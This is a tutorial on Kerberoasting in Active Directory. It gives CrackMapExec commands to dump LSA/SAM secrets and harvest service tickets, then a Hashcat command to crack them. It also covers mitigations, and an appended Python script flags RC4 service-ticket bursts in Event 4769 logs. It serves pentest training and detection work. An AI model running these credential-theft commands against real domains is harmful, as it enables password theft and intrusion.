Kerberoasting is a type of attack that exploits the way Microsoft Active Directory handles service accounts. In this article, we will explore how to perform Kerberoasting with CrackMapExec, a powerful penetration testing tool. We will cover the basics of Kerberos authentication, how Kerberoasting works, and how to use CrackMapExec to extract Kerberos tickets and crack them.
The goal of Kerberoasting is to harvest TGS tickets for services whose SPNs are registered to user accounts in AD, not to computer accounts: a TGS is encrypted with the service account's password hash, so an offline crack of the ticket recovers that account's password, and user-chosen passwords are far weaker than the random machine-account passwords Windows manages itself.
Enumerate service accounts with CrackMapExec
crackmapexec smb <IP> -u <username> -p <password> --lsa --sam
Request and extract the encrypted TGS tickets with CrackMapExec
crackmapexec ldap <IP> -u <username> -p <password> --kdcHost <Host> --kerberoasting output.txt
The ldap module queries the domain for user accounts that have an SPN set, requests a TGS for each of them, and writes the encrypted tickets in Hashcat's krb5tgs format to the file named after --kerberoasting (output.txt here). Any authenticated domain user can issue these requests, which is why the activity is only visible on the domain controller as a burst of TGS requests.
Crack the encrypted Kerberos ticket with Hashcat
hashcat -m 13100 <ticket_file> <wordlist_file>
hashcat -m 13100 output.txt wordlist.txt
Mode 13100 is Kerberos 5 TGS-REP with the RC4-HMAC encryption type (etype 23). Service accounts restricted to AES session keys and given long random passwords (or converted to group Managed Service Accounts) are the standard mitigation, since the ticket is then not practical to crack offline.
Note: Hashcat is not included in CrackMapExec and needs to be installed separately.
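The defender's counterpart of the procedure above is watching the domain controller's Security log for the request pattern it produces: Event ID 4769 (a Kerberos service ticket was requested) with TicketEncryptionType 0x17 (RC4-HMAC) for a service that is a user account rather than a machine account, many distinct such services from one requester within a short window. The script below, an added example that is not part of the original article or of CrackMapExec, parses constructed 4769-style records (the CSV layout, the account names, hosts and timestamps are all made up for the example) and flags requesters that match that pattern.

```python
"""Flag Kerberoasting-style TGS request bursts in Windows Security Event 4769 records.

Added example, not from the article. The record layout below is a constructed
simplification of the 4769 fields: timestamp, TargetUserName (the requesting
account), ServiceName (the SPN / service account), TicketEncryptionType, Status.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

RC4_HMAC = 0x17      # TicketEncryptionType for RC4-HMAC tickets (etype 23)
KDC_ERR_NONE = 0x0   # Status 0x0 means the TGS was actually issued

# Constructed sample records (not real log data). Machine accounts end in '$'.
SAMPLE_EVENTS = """\
2024-05-01T10:00:01Z,alice,svc_sql/db01.corp.example,0x12,0x0
2024-05-01T10:00:02Z,alice,DC01$,0x12,0x0
2024-05-01T10:05:00Z,bob,svc_sql/db01.corp.example,0x17,0x0
2024-05-01T10:05:01Z,bob,svc_web/web01.corp.example,0x17,0x0
2024-05-01T10:05:01Z,bob,svc_backup/bak01.corp.example,0x17,0x0
2024-05-01T10:05:02Z,bob,svc_report/rpt01.corp.example,0x17,0x0
2024-05-01T10:05:03Z,bob,WS05$,0x17,0x0
2024-05-01T10:30:00Z,carol,svc_sql/db01.corp.example,0x17,0x0
"""


@dataclass(frozen=True)
class TgsRequest:
    when: datetime
    requester: str
    service: str
    etype: int
    status: int


def parse_events(text: str) -> list[TgsRequest]:
    """Parse the constructed CSV layout into TgsRequest records."""
    events = []
    for line in text.strip().splitlines():
        when, requester, service, etype, status = line.split(",")
        events.append(TgsRequest(
            datetime.strptime(when, "%Y-%m-%dT%H:%M:%SZ"),
            requester, service, int(etype, 16), int(status, 16)))
    return events


def is_user_service(service: str) -> bool:
    """True for SPNs backed by user accounts: machine accounts end in '$',
    and krbtgt requests are TGT renewals rather than roastable services."""
    account = service.split("/")[0]
    return not account.endswith("$") and account.lower() != "krbtgt"


def rc4_service_requests(events: list[TgsRequest]) -> list[TgsRequest]:
    """Successful RC4-encrypted TGS requests for user-account services.
    Each one is worth a look in an AES-default domain; a burst is the signature."""
    return [e for e in events
            if e.etype == RC4_HMAC and e.status == KDC_ERR_NONE
            and is_user_service(e.service)]


def find_kerberoast_candidates(events: list[TgsRequest],
                               window: timedelta = timedelta(minutes=5),
                               threshold: int = 3) -> dict[str, set[str]]:
    """Map requester -> set of distinct user-account services for which it obtained
    RC4 tickets within any sliding window of the given length, when that count
    reaches the threshold. Tune window/threshold to the environment's baseline."""
    by_user: dict[str, list[TgsRequest]] = defaultdict(list)
    for e in rc4_service_requests(events):
        by_user[e.requester].append(e)

    flagged: dict[str, set[str]] = {}
    for user, reqs in by_user.items():
        reqs.sort(key=lambda e: e.when)
        for i, start in enumerate(reqs):
            in_window = {e.service for e in reqs[i:] if e.when - start.when <= window}
            if len(in_window) >= threshold:
                flagged.setdefault(user, set()).update(in_window)
    return flagged


if __name__ == "__main__":
    parsed = parse_events(SAMPLE_EVENTS)
    for user, services in find_kerberoast_candidates(parsed).items():
        print(f"{user}: {len(services)} RC4 service tickets -> {sorted(services)}")
```

In the sample, alice's AES (0x12) requests and bob's ticket for the WS05$ machine account are ignored; bob's four RC4 tickets for distinct user-account services within seconds are flagged, while carol's single RC4 request is listed by rc4_service_requests but stays below the burst threshold. In a real deployment the same logic runs over 4769 events forwarded from every domain controller, and a domain that has already moved service accounts to AES-only keys can alert on any 0x17 request at all.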
By following these steps, you can easily perform Kerberoasting with CrackMapExec and extract Kerberos tickets from service accounts. Remember, always use penetration testing tools ethically and with permission, and never use them to harm or exploit others.